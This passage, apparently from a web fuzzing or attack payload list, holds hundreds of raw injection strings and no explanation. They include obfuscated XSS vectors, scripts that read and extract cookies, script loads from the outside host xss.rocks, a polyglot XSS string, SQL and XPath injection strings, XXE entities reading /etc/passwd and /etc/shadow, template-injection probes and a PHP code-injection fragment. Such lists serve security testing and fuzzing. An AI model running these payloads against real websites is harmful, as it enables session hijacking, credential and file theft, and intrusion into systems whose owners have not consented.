onmouseover=\"alert('xxs')\">\n<img src ?itworksonchrome?\\/onerror = alert(1)???\n<IMG SRC= onmouseover=\"alert('xxs')\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&amp;#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&amp;#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&amp;#x0D;ascript:alert('XSS');\">\n<IMG SRC=\"javascript:alert('XSS')\"\n<img src=\"javascript:alert('XSS')\">\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<img src=`xx:xx`onerror=alert(1)>\n<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #\n<IMG SRC=java%00script:alert(\\\"XSS\\\")>\n<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n<input type=\"text\" value=``<div/onmouseover='alert(1)'>X</div>\n<input value=<><iframe/src=javascript:confirm(1)\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>?\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?\n<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<script for=document event=onreadystatechange>getElementById('safe123').click()</script>\n<script itworksinallbrowsers>/*<script* */alert(1)</script ?\n<script src=\"data:text/javascript,alert(1)\"></script>\n<SCRIPT SRC=\"http:&#47;&#47;xss.rocks/xss.jpg\"></SCRIPT>\n<SCRIPT SRC=http://xss.rocks/xss.js?< B >\n<script x> alert(1) </script 1=2\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<SCRIPT/SRC=\"http:&#47;&#47;xss.rocks/xss.js\"></SCRIPT>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????\n<SCRIPT\\s\" != \"<SCRIPT/XSS\\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#\n<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>\n<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>\n<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #\n<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>\n<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>\n<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>\n<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>\n<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>\n<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#\n<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>\n<script>~'\\u0061' ;  \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073.  \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script>+-+-1-+-+alert(1)</script>\n<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>alert(document.head.childNodes[3].text)</script>\n<script>alert(document.head.innerHTML.substr(146,20));</script>\n<script>alert('XSS');</script>\n<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>\n<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>\n<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>\n<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>\n<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#\n'<script>window.onload=function(){document.forms[0].message.value='1';}</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>\n<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<svg/onload=alert(1)\n<svg><script ?>alert(1)\n<svg><script onlypossibleinopera:-)> alert(1)\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>\n<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>?\n<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23\nalert\nalert&lpar;1&rpar;\nalert(1)\nalert\\\\`1\\\\`\nalert`1`\n<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>\nhttp://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe\nhttp://www.<script>alert(1)</script .com\nhttps://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe\njavascript:alert%28/xss/%29\njavascript:alert(1)\nPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\nx”</title><img src%3dx onerror%3dalert(1)>\n[[#%3Cscript%3Ealert(1)%3C/script%3E|\na{b:`function(){alert(1)}()`;}\n<SCRIPT>alert('XSS');</SCRIPT>\n'';!--\"<XSS>=&{()}\n<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\nSRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=\"jav\tascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<IMG%0aSRC%0a=%0a\"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a\"%0a>\n<IMG SRC=java%00script:alert(\\\"XSS\\\")>\n<SCR%00IPT>alert(\\\"XSS\\\")</SCR%00IPT>\n<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n<SCRIPT SRC=http://xss.rocks/xss.js?<B>\n<IMG SRC=\"javascript:alert('XSS')\"\n<SCRIPT>a=/XSS/\n\\\";alert('XSS');//\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n<BODY BACKGROUND=\"javascript:alert('XSS')\">\n<BODY ONLOAD=alert('XSS')>\n<IMG DYNSRC=\"javascript:alert('XSS')\">\n<IMG LOWSRC=\"javascript:alert('XSS')\">\n<BGSOUND SRC=\"javascript:alert('XSS');\">\n<BR SIZE=\"&{alert('XSS')}\">\n<LAYER SRC=\"http://xss.rocks/scriptlet.html\"></LAYER>\n<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n<LINK REL=\"stylesheet\" HREF=\"http://xss.rocks/xss.css\">\n<STYLE>@import'http://xss.rocks/xss.css';</STYLE>\n<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.rocks/xss.css>; REL=stylesheet\">\n<STYLE>BODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}</STYLE>\n<IMG SRC='vbscript:msgbox(\"XSS\")'>\n<IMG SRC=\"mocha:[code]\">\n<IMG SRC=\"livescript:[code]\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">\n<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">\n<DIV STYLE=\"width: expression(alert('XSS'));\">\n<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n<XSS STYLE=\"xss:expression(alert('XSS'))\">\nexp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\n<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n<BASE HREF=\"javascript:alert('XSS');//\">\n<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>\ngetURL(\"javascript:alert('XSS')\")\na=\"get\";\n<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">\n<XML SRC=\"http:/xss.rocks/xsstest.xml\" ID=I></XML>\n<HTML><BODY>\n<SCRIPT SRC=\"http://xss.rocks/xss.jpg\"></SCRIPT>\n<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'\"-->\n<? echo('<SCR)';\n<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\n<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n<SCRIPT a=\">\" SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n<SCRIPT a=`>` SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"xss.rocks/xss.js\"></SCRIPT>\njaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e\n/*-/*`/*\\`/*'/*\"/**/\n(/* */oNcliCk=alert() )\n//%0D%0A%0D%0A//\n</stYle/</titLe/</teXtarEa/</scRipt/--!>\n\\x3csVg/<sVg/oNloAd=alert()//>\\x3e\n<input type='text' value='jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e'></input>\n<input type=text value=jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e></input>\n<img border=3 alt=jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e>\n<a href=\"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\">click me</a>\n<math xlink:href=\"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\">click me</math>\n<iframe src=\"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\"></iframe>\n<!--jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e-->\n<style>jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e</style>\n<textarea>jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e</textarea>\n<div>jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e</div>\nvar str = \"jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e\";\nvar str = 'jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e';\n<script>//jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e</script>\n<script>/*jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e*/</script>\n</script><script src=\"https://static.jsbin.com/js/render/edit.js?3.35.11\"></script><script>jsbinShowEdit && jsbinShowEdit({\"static\":\"https://static.jsbin.com\",\"root\":\"https://jsbin.com\"});</script><script>\nsetTimeout(location.search.slice(1));\njaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E\nvar data = \"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\";document.documentElement.innerHTML = data;\nvar data = \"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\";document.head.outerHTML = data;\nvar data = \"jaVasCript:/*-/*`/*\\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\\x3e\";document.write(data);document.close();\n\n\"><style type=text/less>a{b:`function(){alert(1)}()`;}</style>\n' or '1'='1\n' or ''='\nx' or 1=1 or 'x'='y\n/\n//\n//*\n*/*\n@*\ncount(/child::node())\nx' or name()='username' or 'x'='y\n' and count(/*)=1 and '1'='1\n' and count(/@*)=1 and '1'='1\n' and count(/comment())=1 and '1'='1\n' or ''='\n' or '1'='1\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/shadow\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file://c:/boot.ini\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"\n\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://xss.rocks/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"\n\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://xss.rocks/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"\n\"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"\n\"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"\n\"<xml SRC=\"\"xsstest.xml\"\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"\n$\n%\n&apos;XoiZR\n&lt;% Tnn96 %&gt;\n&lt;%= Tnn96 %&gt;\n&lt;? Tnn96 ?&gt;\n&lt;?Tnn96 ?&gt;\n&lt;Tnn96&gt;\n&quot;XoiZR\n(Tnn96)\n*\n*/*\n/\n//\n//*\n:\n;\n@\n@*\n[Tnn96]\n]>\n{{= Tnn96}}\n{{Tnn96}}\n{= Tnn96}\n{Tnn96}\n+\n<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\n<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM \"file:///etc/passwd\">\n<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM \"file:///c:/boot.ini\">\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///dev/random\">]><foo>&xee;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xee;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/shadow\">]><foo>&xee;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xee;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foof>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\n<name>','')); phpinfo(); 